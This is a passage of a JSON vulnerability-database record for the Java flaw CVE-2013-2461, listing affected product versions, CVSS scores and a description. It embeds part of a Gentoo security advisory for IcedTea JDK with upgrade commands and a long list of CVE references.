"vendor": "avaya", "version": "5.2.2" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.5" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.4" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.3" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.2" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.1" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.8" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.4" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.2" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.5" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.3" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.4" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.3" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.2" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.8" }, { "model": "trio tview software", "scope": "ne", "trust": 0.3, "vendor": "schneider electric", "version": "3.29.0" }, { "model": "network and security manager software 2012.2r9", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "virtualization engine ts7700", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.31.0.89" }, { "model": "java sdk sr5", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "java sdk sr6", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.0.1" }, { "model": "java sdk sr14", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "java sdk sr16-fp3", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "java sdk sr13-fp18", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.4.2" } ], "sources": [ { "db": "BID", "id": "60645" }, { "db": "NVD", "id": "CVE-2013-2461" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_19:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_14:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update31:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update32:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update33:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_12:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update29:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update1_b06:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update22:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update23:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update24:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_20:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_21:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update25:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update27:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_16:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_18:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update30:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update34:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update26:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update37:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update39:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update41:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update43:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update35:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update38:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:openjdk:1.7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "r27.7.5", "versionStartIncluding": "r27.7.1", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "r28.2.7", "versionStartIncluding": "r28.0.0", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2013-2461" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Red Hat", "sources": [ { "db": "PACKETSTORM", "id": "122085" }, { "db": "PACKETSTORM", "id": "126195" }, { "db": "PACKETSTORM", "id": "122109" }, { "db": "PACKETSTORM", "id": "122273" } ], "trust": 0.4 }, "cve": "CVE-2013-2461", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULMON", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2013-2461", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.1, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2013-2461", "trust": 1.0, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2013-2461", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2013-2461" }, { "db": "NVD", "id": "CVE-2013-2461" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier and 6 Update 45 and earlier; the Oracle JRockit component in Oracle Fusion Middleware R27.7.5 and earlier and R28.2.7 and earlier; and OpenJDK 7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries. NOTE: the previous information is from the June and July 2013 CPU. Oracle has not commented on claims from another vendor that this issue allows remote attackers to bypass verification of XML signatures via vectors related to a \"Missing check for [a] valid DOMCanonicalizationMethod canonicalization algorithm.\". \nThe vulnerability can be exploited over multiple protocols. This issue affects the \u0027Libraries\u0027 sub-component. \nThis vulnerability affects the following supported versions:\n7 Update 21 , 6 Update 45. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201406-32\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: High\n Title: IcedTea JDK: Multiple vulnerabilities\n Date: June 29, 2014\n Bugs: #312297, #330205, #340819, #346799, #352035, #353418,\n #354231, #355127, #370787, #387637, #404095, #421031,\n #429522, #433389, #438750, #442478, #457206, #458410,\n #461714, #466822, #477210, #489570, #508270\n ID: 201406-32\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in the IcedTea JDK, the worst\nof which could lead to arbitrary code execution. \n\nBackground\n==========\n\nIcedTea is a distribution of the Java OpenJDK source code built with\nfree build tools. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 dev-java/icedtea-bin \u003c 6.1.13.3 \u003e= 6.1.13.3 \n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in the IcedTea JDK. \nPlease review the CVE identifiers referenced below for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll IcedTea JDK users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev-java/icedtea-bin-6.1.13.3\"\n\nReferences\n==========\n\n[ 1 ] CVE-2009-3555\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3555\n[ 2 ] CVE-2010-2548\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2548\n[ 3 ] CVE-2010-2783\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2783\n[ 4 ] CVE-2010-3541\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3541\n[ 5 ] CVE-2010-3548\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3548\n[ 6 ] CVE-2010-3549\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3549\n[ 7 ] CVE-2010-3551\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3551\n[ 8 ] CVE-2010-3553\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3553\n[ 9 ] CVE-2010-3554\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3554\n[ 10 ] CVE-2010-3557\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3557\n[ 11 ] CVE-2010-3561\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3561\n[ 12 ] CVE-2010-3562\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3562\n[ 13 ] CVE-2010-3564\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3564\n[ 14 ] CVE-2010-3565\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3565\n[ 15 ] CVE-2010-3566\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3566\n[ 16 ] CVE-2010-3567\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3567\n[ 17 ] CVE-2010-3568\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3568\n[ 18 ] CVE-2010-3569\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3569\n[ 19 ] CVE-2010-3573\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3573\n[ 20 ] CVE-2010-3574\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3574\n[ 21 ] CVE-2010-3860\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3860\n[ 22 ] CVE-2010-4351\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4351\n[ 23 ] CVE-2010-4448\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4448\n[ 24 ] CVE-2010-4450\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4450\n[ 25 ] CVE-2010-4465\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4465\n[ 26 ] CVE-2010-4467\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4467\n[ 27 ] CVE-2010-4469\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4469\n[ 28 ] CVE-2010-4470\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4470\n[ 29 ] CVE-2010-4471\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4471\n[ 30 ] CVE-2010-4472\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4472\n[ 31 ] CVE-2010-4476\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4476\n[ 32 ] CVE-2011-0025\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0025\n[ 33 ] CVE-2011-0706\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0706\n[ 34 ] CVE-2011-0815\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0815\n[ 35 ] CVE-2011-0822\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0822\n[ 36 ] CVE-2011-0862\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0862\n[ 37 ] CVE-2011-0864\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0864\n[ 38 ] CVE-2011-0865\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0865\n[ 39 ] CVE-2011-0868\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0868\n[ 40 ] CVE-2011-0869\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0869\n[ 41 ] CVE-2011-0870\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0870\n[ 42 ] CVE-2011-0871\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0871\n[ 43 ] CVE-2011-0872\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0872\n[ 44 ] CVE-2011-3389\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3389\n[ 45 ] CVE-2011-3521\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3521\n[ 46 ] CVE-2011-3544\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3544\n[ 47 ] CVE-2011-3547\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3547\n[ 48 ] CVE-2011-3548\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3548\n[ 49 ] CVE-2011-3551\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3551\n[ 50 ] CVE-2011-3552\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3552\n[ 51 ] CVE-2011-3553\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3553\n[ 52 ] CVE-2011-3554\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3554\n[ 53 ] CVE-2011-3556\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3556\n[ 54 ] CVE-2011-3557\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3557\n[ 55 ] CVE-2011-3558\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3558\n[ 56 ] CVE-2011-3560\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3560\n[ 57 ] CVE-2011-3563\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3563\n[ 58 ] CVE-2011-3571\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3571\n[ 59 ] CVE-2011-5035\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-5035\n[ 60 ] CVE-2012-0497\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0497\n[ 61 ] CVE-2012-0501\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0501\n[ 62 ] CVE-2012-0502\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0502\n[ 63 ] CVE-2012-0503\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0503\n[ 64 ] CVE-2012-0505\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0505\n[ 65 ] CVE-2012-0506\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0506\n[ 66 ] CVE-2012-0547\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0547\n[ 67 ] CVE-2012-1711\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1711\n[ 68 ] CVE-2012-1713\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1713\n[ 69 ] CVE-2012-1716\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1716\n[ 70 ] CVE-2012-1717\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1717\n[ 71 ] CVE-2012-1718\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1718\n[ 72 ] CVE-2012-1719\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1719\n[ 73 ] CVE-2012-1723\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1723\n[ 74 ] CVE-2012-1724\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1724\n[ 75 ] CVE-2012-1725\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1725\n[ 76 ] CVE-2012-1726\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1726\n[ 77 ] CVE-2012-3216\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3216\n[ 78 ] CVE-2012-3422\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3422\n[ 79 ] CVE-2012-3423\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3423\n[ 80 ] CVE-2012-4416\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4416\n[ 81 ] CVE-2012-4540\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4540\n[ 82 ] CVE-2012-5068\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5068\n[ 83 ] CVE-2012-5069\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5069\n[ 84 ] CVE-2012-5070\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5070\n[ 85 ] CVE-2012-5071\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5071\n[ 86 ] CVE-2012-5072\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5072\n[ 87 ] CVE-2012-5073\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5073\n[ 88 ] CVE-2012-5074\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5074\n[ 89 ] CVE-2012-5075\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5075\n[ 90 ] CVE-2012-5076\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5076\n[ 91 ] CVE-2012-5077\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5077\n[ 92 ] CVE-2012-5081\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5081\n[ 93 ] CVE-2012-5084\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5084\n[ 94 ] CVE-2012-5085\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5085\n[ 95 ] CVE-2012-5086\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5086\n[ 96 ] CVE-2012-5087\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5087\n[ 97 ] CVE-2012-5089\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5089\n[ 98 ] CVE-2012-5979\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5979\n[ 99 ] CVE-2013-0169\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0169\n[ 100 ] CVE-2013-0401\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0401\n[ 101 ] CVE-2013-0424\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0424\n[ 102 ] CVE-2013-0425\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0425\n[ 103 ] CVE-2013-0426\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0426\n[ 104 ] CVE-2013-0427\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0427\n[ 105 ] CVE-2013-0428\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0428\n[ 106 ] CVE-2013-0429\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0429\n[ 107 ] CVE-2013-0431\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0431\n[ 108 ] CVE-2013-0432\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0432\n[ 109 ] CVE-2013-0433\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0433\n[ 110 ] CVE-2013-0434\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0434\n[ 111 ] CVE-2013-0435\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0435\n[ 112 ] CVE-2013-0440\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0440\n[ 113 ] CVE-2013-0441\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0441\n[ 114 ] CVE-2013-0442\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0442\n[ 115 ] CVE-2013-0443\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0443\n[ 116 ] CVE-2013-0444\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0444\n[ 117 ] CVE-2013-0450\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0450\n[ 118 ] CVE-2013-0809\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0809\n[ 119 ] CVE-2013-1475\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1475\n[ 120 ] CVE-2013-1476\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1476\n[ 121 ] CVE-2013-1478\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1478\n[ 122 ] CVE-2013-1480\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1480\n[ 123 ] CVE-2013-1484\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1484\n[ 124 ] CVE-2013-1485\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1485\n[ 125 ] CVE-2013-1486\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1486\n[ 126 ] CVE-2013-1488\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1488\n[ 127 ] CVE-2013-1493\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1493\n[ 128 ] CVE-2013-1500\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1500\n[ 129 ] CVE-2013-1518\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1518\n[ 130 ] CVE-2013-1537\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1537\n[ 131 ] 